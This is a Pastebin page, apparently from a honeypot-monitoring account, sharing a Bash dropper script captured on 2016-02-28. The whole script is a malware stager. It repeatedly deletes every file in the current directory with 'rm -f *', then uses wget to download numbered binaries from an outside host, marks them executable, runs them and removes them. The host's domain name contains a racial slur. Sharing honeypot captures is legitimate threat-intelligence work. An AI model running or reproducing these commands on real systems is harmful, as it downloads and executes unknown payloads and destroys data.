Advertisement
recon-scout

Honeypot Payload! Seen on: 2016-02-28 04:15

Feb 29th, 2016
145
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 0.54 KB | None | 0 0
  1. #!/bin/bash
  2. rm -f *
  3. wget -q http://neger.dingle.dog/100; chmod +x 100; ./100; rm -f 100*
  4. rm -f *
  5. wget -q http://neger.dingle.dog/200; chmod +x 200; ./200; rm -f 200*
  6. rm -f *
  7. wget -q http://neger.dingle.dog/300; chmod +x 300; ./300; rm -f 300*
  8. rm -f *
  9. wget -q http://neger.dingle.dog/400; chmod +x 400; ./400; rm -f 400*
  10. rm -f *
  11. wget -q http://neger.dingle.dog/500; chmod +x 500; ./500; rm -f 500*
  12. rm -f *
  13. wget -q http://neger.dingle.dog/600; chmod +x 600; ./600; rm -f 600*
  14. rm -f *
  15. wget -q http://neger.dingle.dog/700; chmod +x 700; ./700; rm -f 700*
  16. exit
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement